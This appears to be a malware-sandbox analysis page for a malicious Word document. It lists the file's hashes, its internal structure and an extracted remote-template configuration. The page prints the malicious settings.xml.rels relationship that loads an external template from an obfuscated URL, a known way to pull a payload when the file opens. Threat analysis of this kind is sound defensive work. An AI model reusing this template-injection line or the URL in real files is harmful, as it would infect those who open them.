Malicious
Malicious

d78d56357fd121536fde7bb726411266

MS Word Document
|
MD5: d78d56357fd121536fde7bb726411266
|
Size: 439.98 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d78d56357fd121536fde7bb726411266
Sha1
20988f4f4f4afc7b57e59f6049f1918f16318b9a
Sha256
10ac50e3742cda7404120bac1d737c3dc676b599672bb6e5980e64ef61861ed0
Sha384
1d05971e3edfd4534b46b308407528655f49df171b2fe8f8e8e8b7a7894784b96ad2e0e52713fd5bc713a297eedacf3b
Sha512
d61bf0d77bbd0a154bd303d70c58ef7f4addc8e5352d05d375d8cc4f04a1ba828a157356ad50358e890164a6b6a463f300fa52cbf2ada6fd75d79eb0fc6f7cd1
SSDeep
12288:W87CmLQPvGeyCUdeoilD3AzZTYGwKXteh:W8GdPvGe+gljAzhP5t0
TLSH
6E9423ADF01DA063D78EF3B412556ACCA8379C217611F1A9203F979CD6CB398BD76A04
File Structure
d78d56357fd121536fde7bb726411266
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
header2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer3.xml
header3.xml
header2.xml
endnotes.xml
media
image1.png
image1.png-preview.png
embeddings
oleObject1.bin
Root Entry
Ole
CompObj
ObjInfo
Ole10Native
theme
theme1.xml
settings.xml
styles.xml
webSettings.xml
fontTable.xml
docProps
core.xml
app.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://givingbestsignwithbetterthingstodoformeansbusinesscegemebttosoeedpgiod.DoTX@ct.rocks/v4RkCG
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://givingbestsignwithbetterthingstodoformeansbusinesscegemebttosoeedpgiod.DoTX@ct.rocks/v4RkCG" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://givingbestsignwithbetterthingstodoformeansbusinesscegemebttosoeedpgiod.DoTX@ct.rocks/v4RkCG
d78d56357fd121536fde7bb726411266 (439.98 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙